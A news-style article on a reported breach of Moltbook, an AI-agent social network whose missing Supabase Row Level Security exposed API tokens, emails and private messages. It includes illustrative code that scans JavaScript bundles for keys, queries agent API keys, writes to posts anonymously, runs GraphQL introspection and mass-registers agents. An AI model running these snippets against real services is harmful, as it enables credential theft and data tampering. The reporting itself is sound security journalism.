Viral social network “Moltbook,” built entirely with AI-generated code, leaked authentication tokens, private messages and user emails through missing security controls in its production environment.
Wiz Security discovered a critical vulnerability in Moltbook, a viral social network for AI agents, that exposed 1.5 million API authentication tokens, 35,000 user email addresses and thousands of private messages through a misconfigured database. The platform’s creator admitted he “didn’t write a single line of code,” relying entirely on AI-generated code that failed to implement basic security protections.
The vulnerability stemmed from an exposed Supabase API key in client-side JavaScript that granted unauthenticated read and write access to Moltbook’s entire production database. Researchers discovered the flaw within minutes of examining the platform’s publicly accessible code bundles, demonstrating how easily attackers could compromise the system.
“When properly configured with Row Level Security, the public API key is safe to expose—it acts like a project identifier,” explained Gal Nagli, Wiz’s head of threat exposure. “However, without RLS policies, this key grants full database access to anyone who has it. In Moltbook’s implementation, this critical line of defense was missing.”
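For illustration, here is a minimal sketch of that attack surface using the official @supabase/supabase-js client. The table and column names are hypothetical stand-ins rather than Moltbook’s actual schema, and the URL and key are placeholders for the values recovered from the bundle:

    import { createClient } from '@supabase/supabase-js';

    // Placeholder values standing in for the URL and anon key found in the bundle.
    const SUPABASE_URL = 'https://<project-ref>.supabase.co';
    const SUPABASE_ANON_KEY = '<anon key extracted from the JavaScript bundle>';

    const supabase = createClient(SUPABASE_URL, SUPABASE_ANON_KEY);

    // With RLS policies in place, an anonymous caller gets an error or an empty
    // result here. Without them, the query returns every reachable row.
    const { data, error } = await supabase
      .from('agents')            // hypothetical table name
      .select('name, api_key');  // hypothetical columns

    console.log(error ?? data);

Run against a properly locked-down project, the same call returns nothing useful, which is exactly the line of defense Nagli describes as missing.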

What Is Moltbook
Moltbook launched on January 28 as a Reddit-like platform where autonomous AI agents could post content, vote and interact with each other. The concept attracted significant attention from technology influencers, including former Tesla AI director Andrej Karpathy, who called it “the most incredible sci-fi takeoff-adjacent thing” he had seen recently. The viral attention drove massive traffic within hours of launch.
However, the platform’s backend relied on Supabase, a popular open-source Firebase alternative providing hosted PostgreSQL databases with REST APIs. Supabase became especially popular with “vibe-coded” applications—projects built rapidly using AI code generation tools—due to its ease of setup. The service requires developers to enable Row Level Security policies to prevent unauthorized database access, but Moltbook’s AI-generated code omitted this critical configuration.


Wiz researchers examined the client-side JavaScript bundles loaded automatically when users visited Moltbook’s website. Modern web applications bundle configuration values into static JavaScript files, which can inadvertently expose sensitive credentials when developers fail to implement proper security practices.
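As a rough sketch of how quickly such a review can surface credentials, the snippet below fetches a page’s script bundles and searches them for Supabase project URLs and JWT-shaped keys. The regular expressions are simplified assumptions for illustration, not Wiz’s actual tooling:

    // Sketch: fetch a page's script bundles and search them for embedded
    // Supabase project URLs and JWT-shaped keys (anon keys start with "eyJ").
    async function scanBundles(pageUrl: string): Promise<void> {
      const html = await (await fetch(pageUrl)).text();

      // Collect the script sources referenced by the page (simplified regex).
      const scripts = [...html.matchAll(/<script[^>]+src="([^"]+)"/g)].map(m => m[1]);

      for (const src of scripts) {
        const bundle = await (await fetch(new URL(src, pageUrl))).text();

        const urls = bundle.match(/https:\/\/[a-z0-9]+\.supabase\.co/g) ?? [];
        const keys = bundle.match(/eyJ[\w-]+\.[\w-]+\.[\w-]+/g) ?? [];

        if (urls.length || keys.length) {
          console.log(src, { urls, keys });
        }
      }
    }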
What Data Was Leaking, and How
The exposed data included approximately 4.75 million database records. Beyond the 1.5 million API authentication tokens that would allow complete agent impersonation, researchers discovered 35,000 email addresses of platform users and an additional 29,631 early access signup emails. The platform claimed 1.5 million registered agents, but the database revealed only 17,000 human owners—an 88:1 ratio.
More concerning, 4,060 private direct message conversations between agents were fully accessible without encryption or access controls. Some conversations contained plaintext OpenAI API keys and other third-party credentials that users shared under the assumption of privacy. This demonstrated how a single platform misconfiguration can expose credentials for entirely unrelated services.
The vulnerability extended beyond read access. Even after Moltbook deployed an initial fix blocking read access to sensitive tables, write access to public tables remained open. Wiz researchers confirmed they could successfully modify existing posts on the platform, introducing risks of content manipulation and prompt injection attacks.
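A hedged sketch of what that residual write access looks like with the same exposed key; the posts table and its columns are assumptions made for illustration:

    import { createClient } from '@supabase/supabase-js';

    // Same exposed anon key as before; URL and key are placeholders.
    const supabase = createClient('https://<project-ref>.supabase.co', '<exposed anon key>');

    // Reads on sensitive tables were blocked by the first fix, but tables
    // without restrictive RLS policies still accepted anonymous writes.
    const { error } = await supabase
      .from('posts')                                  // hypothetical table name
      .update({ content: 'edited by an outsider' })   // content manipulation
      .eq('id', 'some-post-id');                      // hypothetical row id

    console.log(error ?? 'Update accepted without any authentication.');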
Wiz used GraphQL introspection—a method for exploring server data schemas—to map the complete database structure. Unlike properly secured implementations that would return errors or empty arrays for unauthorized queries, Moltbook’s database responded as if researchers were authenticated administrators, immediately providing sensitive authentication tokens including API keys of the platform’s top AI agents.
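For reference, a standard introspection query of that kind looks like the sketch below. The /graphql/v1 path and apikey header follow Supabase’s documented GraphQL interface; the rest is illustrative:

    // A standard GraphQL introspection query that lists every exposed type.
    const INTROSPECTION = '{ __schema { types { name fields { name } } } }';

    const res = await fetch('https://<project-ref>.supabase.co/graphql/v1', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        apikey: '<exposed anon key>',   // the key recovered from the bundle
      },
      body: JSON.stringify({ query: INTROSPECTION }),
    });

    // A locked-down project answers with errors or empty results; Moltbook's
    // answered with its full schema, table by table.
    console.log(JSON.stringify(await res.json(), null, 2));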
Matt Schlicht, CEO of Octane AI and Moltbook’s creator, publicly stated his development approach: “I didn’t write a single line of code for Moltbook. I just had a vision for the technical architecture, and AI made it a reality.” This “vibe coding” practice prioritizes speed and intent over engineering rigor, but the Moltbook breach demonstrates the dangerous security oversights that can result.
Wiz followed responsible disclosure practices after discovering the vulnerability on January 31. The company contacted Moltbook’s maintainer, and the platform deployed its first fix, securing the most sensitive tables, within a couple of hours. Additional fixes addressing exposed data, blocking write access and securing the remaining tables followed over the next few hours, with final remediation completed by February 1.
“As AI continues to lower the barrier to building software, more builders with bold ideas but limited security experience will ship applications that handle real users and real data,” Nagli concluded. “That’s a powerful shift.”
The breach revealed that anyone could register unlimited agents through simple loops with no rate limiting, and users could post content disguised as AI agents via basic POST requests. The platform lacked mechanisms to verify whether “agents” were actually autonomous AI or simply humans with scripts.
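In practice that gap looks as simple as the loop below; the registration endpoint and payload fields are hypothetical stand-ins, since the report does not publish Moltbook’s actual API:

    // With no rate limiting, a plain loop of POST requests can register as
    // many "agents" as the caller wants. Endpoint and fields are hypothetical.
    for (let i = 0; i < 1000; i++) {
      await fetch('https://moltbook.example/api/agents', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ name: `definitely-an-agent-${i}` }),
      });
    }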
